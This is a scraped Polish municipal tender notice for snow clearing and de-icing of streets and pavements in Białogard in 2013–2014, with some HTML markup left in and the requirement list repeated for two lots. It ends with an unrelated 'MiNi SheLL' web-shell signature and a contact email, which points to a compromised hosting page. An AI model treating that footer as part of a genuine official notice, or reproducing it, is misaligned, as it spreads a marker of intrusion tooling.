1) Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były blokowane zwałami śniegu, umożliwiając swobodne przechodzenie pieszych przez ulice.
2) Wymagany ilościowy skład mieszanki solno-piaskowej ma zawierać nie mniej 25% soli drogowej, 
a zużycie mieszanki solno-piaskowej nie może być mniejsze niż 100 g na 1 m 2 powierzchni.
3) Sprzątanie chodników odbywać się będzie każdego dnia tygodnia z wyjątkiem niedziel i świąt, 
od godziny 5°° tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym. 
4) Odśnieżanie chodników odbywać się będzie od godziny 500. Dodatkowe wykonywanie czynności 
(w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia ) odbywać się będzie:
-w dni robocze (od poniedziałki do piątku) - na pisemnie, telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
5)	W przypadku odśnieżania ulic czynności wykonywane będą od godziny 4°°, z zastrzeżeniem, że po raz pierwszy wykonywanie czynności objętych zamówieniem rozpocznie się po uprzednim zawiadomieniu Wykonawcy przez Zamawiającego. Dodatkowe wykonywanie czynności  (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia) odbywać się będzie:
-w dni robocze (od poniedziałku do piątku) - na pisemnie , telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
6)	W przypadku nagromadzenia się znacznej ilości śniegu zgarniętego z chodników, placów i jezdni utrudniającego ruch pojazdów i pieszych, decyzję o jego usunięciu podejmie Zamawiający, 
a Wykonawca zobowiązany jest usunąć i wywieźć śnieg na miejsce wskazane przez Zamawiającego. 
7)	Zamawiający określi czas i miejsca zbierania nagromadzonego piasku.
8)	Zamawiający zastrzega sobie posiadanie z Wykonawcą łączności (telefon, telefon komórkowy, fax) 
o każdej porze dnia i nocy.
9)	Zamawiający zastrzega sobie prawo do zawieszenia trwania akcji zimowej (utrzymania w gotowości sprzętu do akcji zimowej), jeżeli warunki pogodowe będą korzystne oraz temperatura dodatnia, przez okres 3 dni, bez ponoszenia dodatkowych kosztów z tytułu zawieszenia akcji.
10)	Przed podpisaniem umowy Wykonawca złoży Zamawiającemu harmonogram prac:
a) chodniki: na odśnieżanie i na sprzątanie w przypadku braku śniegu,
b) ulice: na odśnieżanie.
11)	Wykonawca jako wytwórca i posiadacz odpadów komunalnych zobowiązany jest do:
a)	wskazania tytułu prawnego do terenu, na którym będzie wstępnie magazynował zebrane odpady komunalne do czasu ich odbioru przez uprawnionego przedsiębiorcę,
b)	wyposażenia nieruchomości w pojemniki służące do zbierania odpadów komunalnych zgodnie 
z Regulaminem Utrzymania Czystości i Porządku na terenie Miasta Białogard oraz utrzymywania tych pojemników w odpowiednim stanie sanitarnym, porządkowym i technicznym,
c)	wstępnego magazynowania zebranych odpadów komunalnych na terenie nieruchomości do której ma tytuł prawny do czasu ich odbioru przez uprawnionego przedsiębiorcę,
d)	złożenia do Burmistrza Białogardu deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi w terminie 14 dni od dnia rozpoczęcia wstępnego magazynowania zebranych odpadów komunalnych,
e)	ponoszenia na rzecz Miasta Białogard opłaty za gospodarowanie odpadami komunalnymi,
f)	prowadzenia dokumentacji, na podstawie której przedłoży na koniec okresu realizacji umowy informacje określające ilość zebranych odpadów komunalnych oraz poszczególnych rodzajów selektywnie zebranych odpadów komunalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odśnieżanie ulic w terminie od dnia 18.11.2013 r. do dnia 17.03.2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> utrzymanie ulic, w tym:
a)	odśnieżanie jezdni;
b)	likwidacja śliskości zimowej (gołoledzi), poprzez posypywanie jezdni mieszanką solno-piaskową, którą zapewnia wykonawca,
c)	wywóz zwałów nagromadzonego śniegu.
Wykaz ulic podlegających odśnieżaniu zamieszczono w załączniku D.
Dodatkowe wymogi:
1)	Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były blokowane zwałami śniegu, umożliwiając swobodne przechodzenie pieszych przez ulice.
2)	Wymagany ilościowy skład mieszanki solno-piaskowej ma zawierać nie mniej 25% soli drogowej, 
a zużycie mieszanki solno-piaskowej nie może być mniejsze niż 100 g na 1 m 2 powierzchni.
3)	Sprzątanie chodników odbywać się będzie każdego dnia tygodnia z wyjątkiem niedziel i świąt, 
od godziny 5°° tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym. 
4)	Odśnieżanie chodników odbywać się będzie od godziny 500. Dodatkowe wykonywanie czynności 
(w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia ) odbywać się będzie:
-w dni robocze (od poniedziałki do piątku) - na pisemnie, telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
5)	W przypadku odśnieżania ulic czynności wykonywane będą od godziny 4°°, z zastrzeżeniem, że po raz pierwszy wykonywanie czynności objętych zamówieniem rozpocznie się po uprzednim zawiadomieniu Wykonawcy przez Zamawiającego. Dodatkowe wykonywanie czynności  (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia) odbywać się będzie:
-w dni robocze (od poniedziałku do piątku) - na pisemnie , telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
6)	W przypadku nagromadzenia się znacznej ilości śniegu zgarniętego z chodników, placów i jezdni utrudniającego ruch pojazdów i pieszych, decyzję o jego usunięciu podejmie Zamawiający, 
a Wykonawca zobowiązany jest usunąć i wywieźć śnieg na miejsce wskazane przez Zamawiającego. 
7)	Zamawiający określi czas i miejsca zbierania nagromadzonego piasku.
8)	Zamawiający zastrzega sobie posiadanie z Wykonawcą łączności (telefon, telefon komórkowy, fax) 
o każdej porze dnia i nocy.
9)	Zamawiający zastrzega sobie prawo do zawieszenia trwania akcji zimowej (utrzymania w gotowości sprzętu do akcji zimowej), jeżeli warunki pogodowe będą korzystne oraz temperatura dodatnia, przez okres 3 dni, bez ponoszenia dodatkowych kosztów z tytułu zawieszenia akcji.
10)	Przed podpisaniem umowy Wykonawca złoży Zamawiającemu harmonogram prac:
a) chodniki: na odśnieżanie i na sprzątanie w przypadku braku śniegu,
b) ulice: na odśnieżanie.
11)	Wykonawca jako wytwórca i posiadacz odpadów komunalnych zobowiązany jest do:
a)	wskazania tytułu prawnego do terenu, na którym będzie wstępnie magazynował zebrane odpady komunalne do czasu ich odbioru przez uprawnionego przedsiębiorcę,
b)	wyposażenia nieruchomości w pojemniki służące do zbierania odpadów komunalnych zgodnie 
z Regulaminem Utrzymania Czystości i Porządku na terenie Miasta Białogard oraz utrzymywania tych pojemników w odpowiednim stanie sanitarnym, porządkowym i technicznym,
c)	wstępnego magazynowania zebranych odpadów komunalnych na terenie nieruchomości do której ma tytuł prawny do czasu ich odbioru przez uprawnionego przedsiębiorcę,
d)	złożenia do Burmistrza Białogardu deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi w terminie 14 dni od dnia rozpoczęcia wstępnego magazynowania zebranych odpadów komunalnych,
e)	ponoszenia na rzecz Miasta Białogard opłaty za gospodarowanie odpadami komunalnymi,
f)	prowadzenia dokumentacji, na podstawie której przedłoży na koniec okresu realizacji umowy informacje określające ilość zebranych odpadów komunalnych oraz poszczególnych rodzajów selektywnie zebranych odpadów komunalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com